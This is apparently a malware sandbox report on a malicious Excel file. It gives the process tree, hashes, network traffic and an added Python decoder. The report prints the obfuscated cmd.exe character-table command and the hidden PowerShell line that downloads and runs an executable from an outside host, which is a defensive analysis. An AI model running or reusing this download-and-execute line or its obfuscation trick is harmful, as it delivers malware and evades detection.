Field | Value
---|---
File name | 0535f6306fde54ba2a86ff0a14a107d997ab45334424ccdb99eecf62bcbbae54
Full analysis | https://app.any.run/tasks/ca6a6196-3cab-4fd8-a056-5069db919b5b
Verdict | Malicious activity
Analysis date | April 23, 2019, 10:47:43
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | —
Indicators | —
MIME | application/vnd.ms-excel
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: ESSSSSS, Last Saved By: ESSSSSS, Last Saved Time/Date: Thu Mar 28 05:14:51 2019, Security: 0
MD5 | 16BC70012D54BCBF49783B4E063695EE
SHA1 | 21985F7F68440CADB846ECD86594BF0761B20635
SHA256 | 0535F6306FDE54BA2A86FF0A14A107D997AB45334424CCDB99EECF62BCBBAE54
SSDEEP | 768:hkQzlaZAWh+ZO33ufIUfhttR6wyE/K87A14OiCdpqdRXgL7:KQzlaZAWh+ZO33ufIUfhttR6wyE/K87o
Extension | Description | TrID score (%)
---|---|---
.xls | Microsoft Excel sheet | 48
.xls | Microsoft Excel sheet (alternate) | 39.2
Field | Value
---|---
HeadingPairs | —
TitleOfParts | chibykeexploit
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 15
CodePage | Windows Latin 1 (Western European)
Security | None
ModifyDate | 2019:03:28 05:14:51
LastModifiedBy | ESSSSSS
Author | ESSSSSS
CompObjUserType | Microsoft Excel 2003 Worksheet
CompObjUserTypeLen | 31
PID | Command line | Path | Indicators | Parent process
---|---|---|---|---
3568 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe
3908 | C:\warren\televisions\volunteer\..\..\..\windows\system32\cmd.exe /v:ON /c"set brings= && set deadline=%h=(z9r:xYde;GbLnyHQc.@UA63MEq)5v\fSum7X1TK$Rt8_aw4kIZ'2Wslj~JFBi-/OPV+D Ng0p,Co && for %H in (76,79,49,11,6,57,1,11,58,58,21,11,8,11,72,65,49,72,1,64,10,10,11,16,72,65,11,76,72,14,17,76,48,57,57,72,3,73,11,49,65,67,14,59,11,20,45,72,35,17,57,45,11,37,21,73,11,45,21,56,11,14,78,58,64,11,16,45,30,21,71,79,49,16,58,79,48,10,62,64,58,11,3,54,1,45,45,76,7,66,66,4,11,16,45,48,20,1,11,6,21,37,58,66,20,1,64,14,17,51,11,21,11,8,11,54,77,43,11,16,32,7,45,11,37,76,72,70,72,54,33,34,11,48,45,36,6,11,57,21,11,8,11,54,30,12,7550) DO (set brings=!brings!!deadline:~%H,1!) && if %H == 7550 call !brings:~-146!" && %tmp%/features.exe | C:\windows\system32\cmd.exe | — | EXCEL.EXE
2716 | powershell.exe -w hidden -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://zentacher.ml/chibyke.exe',$env:temp + '\features.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe

PID | User | Company | Integrity level | Description | Exit code | Version
---|---|---|---|---|---|---
3568 | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 0 | 14.0.6024.1000
3908 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2716 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 1 | 6.1.7600.16385 (win7_rtm.090713-1255)
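The cmd.exe command line of PID 3908 hides its payload in a character table: `deadline` holds 80 characters, the `for` loop appends one character per listed index (`!deadline:~%H,1!`) to `brings`, and `call !brings:~-146!` executes the last 146 characters of the result, which is exactly the PowerShell downloader seen as PID 2716. The leading `C:\warren\televisions\volunteer\..\..\..\` in the path is padding; Windows normalises it to `C:\windows\system32\cmd.exe` without those directories existing. The decoder below is an added example and not part of the ANY.RUN report: the command line is copied from the process table above, while the function names and the emulation of cmd.exe substring expansion are this example's own.

```python
"""Decode the cmd.exe character-table obfuscation used by process 3908.

Added example, not part of the sandbox report. The loop builds the payload
one character at a time: for every index in the list it appends
!deadline:~INDEX,1! (one character of the `deadline` string) to `brings`,
then `call`s the last 146 characters of the result.
"""
import re
from typing import List, Optional

# Command line of PID 3908, copied from the process table and split across
# adjacent string literals for readability only.
CMDLINE = (
    r'C:\warren\televisions\volunteer\..\..\..\windows\system32\cmd.exe /v:ON '
    r'/c"set brings= && '
    r"set deadline=%h=(z9r:xYde;GbLnyHQc.@UA63MEq)5v\fSum7X1TK$Rt8_aw4kIZ'2Wslj"
    r"~JFBi-/OPV+D Ng0p,Co && for %H in ("
    r"76,79,49,11,6,57,1,11,58,58,21,11,8,11,72,65,49,72,1,64,"
    r"10,10,11,16,72,65,11,76,72,14,17,76,48,57,57,72,3,73,11,49,"
    r"65,67,14,59,11,20,45,72,35,17,57,45,11,37,21,73,11,45,21,56,"
    r"11,14,78,58,64,11,16,45,30,21,71,79,49,16,58,79,48,10,62,64,"
    r"58,11,3,54,1,45,45,76,7,66,66,4,11,16,45,48,20,1,11,6,"
    r"21,37,58,66,20,1,64,14,17,51,11,21,11,8,11,54,77,43,11,16,"
    r"32,7,45,11,37,76,72,70,72,54,33,34,11,48,45,36,6,11,57,21,"
    r"11,8,11,54,30,12,7550"
    r") DO (set brings=!brings!!deadline:~%H,1!) && if %H == 7550 "
    r'call !brings:~-146!" && %tmp%/features.exe'
)

# Shape of the decoder loop:
#   for %V in (i1,i2,...) DO (set ACC=!ACC!!TABLE:~%V,WIDTH!)
LOOP_RE = re.compile(
    r"for (%\w) in \(([\d,]+)\) DO \(set (\w+)=!\3!!(\w+):~\1,(\d+)!\)"
)


def cmd_substring(value: str, start: int, length: Optional[int] = None) -> str:
    """Emulate cmd.exe's !VAR:~start,length! expansion.

    A negative start counts from the end, a start past the end yields an
    empty string (which is why the trailing index 7550 adds nothing), and a
    negative length drops that many characters from the end.
    """
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    end = start + length if length >= 0 else n + length
    return value[start:end] if end > start else ""


def initial_value(cmdline: str, name: str) -> str:
    """Value assigned by the first `set NAME=... &&` in the command line.

    cmd.exe keeps everything after '=' up to the operator, trailing space
    included, so `set brings= &&` initialises brings to a single space.
    """
    m = re.search(rf"set {re.escape(name)}=([^&]*)&&", cmdline)
    return m.group(1) if m else ""


def decode_cmd_loop(cmdline: str) -> str:
    """Return the command that `call` would execute at the end of the loop."""
    m = LOOP_RE.search(cmdline)
    if m is None:
        raise ValueError("no character-table loop found in command line")
    _, index_list, acc, table, width = m.groups()
    table_value = initial_value(cmdline, table)
    acc_value = initial_value(cmdline, acc)
    for index in (int(i) for i in index_list.split(",")):
        acc_value += cmd_substring(table_value, index, int(width))
    # `call !brings:~-146!` keeps only the last 146 characters, which drops
    # the leading space left by `set brings= `.
    tail = re.search(rf"call !{re.escape(acc)}:~(-?\d+)!", cmdline)
    return cmd_substring(acc_value, int(tail.group(1))) if tail else acc_value


def payload_urls(command: str) -> List[str]:
    """URLs embedded in the decoded command, for blocking and pivoting."""
    return re.findall(r"https?://[^\s'\"]+", command)


if __name__ == "__main__":
    decoded = decode_cmd_loop(CMDLINE)
    print(decoded)
    print(payload_urls(decoded))
```

Running the block prints the decoded PowerShell command line and the URL it fetches. In this run the download returned HTTP 522 from the Cloudflare-fronted host, no `features.exe` appears in the file list, and both cmd.exe and powershell.exe exited with code 1, so the second stage never executed in the sandbox; the decoded URL is still the indicator to block.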
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3568 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6E65.tmp.cvr | — | — | —
2716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NBMP2I5EHEFP8YQX3BMS.temp | — | — | —
3568 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF63013AB50F714CCF.TMP | — | — | —
3568 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFEC25DF07A70BCD25.TMP | — | — | —
3568 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0535f6306fde54ba2a86ff0a14a107d997ab45334424ccdb99eecf62bcbbae54.xls.LNK | lnk | AA50379D3D249D7F9C686072A1A7C851 | 3F4AD333FF87EA5595C68AE675CC9DAA2C73BA117419F05A8A785B95279F7747
3568 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 45EFAC1EE4703DEBE5B85A9777996FAB | 92E0A98A594732249C19BFC5235D4BFC5E5E1A5812EAF35C4AF074CD2D2781EB
2716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3568 | EXCEL.EXE | C:\Users\admin\Desktop\0535f6306fde54ba2a86ff0a14a107d997ab45334424ccdb99eecf62bcbbae54.xls | document | 9F44D44F1A27CC5EDEF5D3320AD9E3BA | BE76275576FFEEB911676A428720CE2067E0E06E982D2AA3B6DA42E1C4378DBC
2716 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe8364.TMP | binary | 131DC75F6D4142CA9244945A91A71E8D | F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2716 | powershell.exe | GET | 522 | 104.24.105.236:80 | http://zentacher.ml/chibyke.exe | US | html | 4.63 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2716 | powershell.exe | 104.24.105.236:80 | zentacher.ml | Cloudflare Inc | US | shared |
Domain | IP | Reputation
---|---|---
zentacher.ml | — | suspicious
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ml Domain |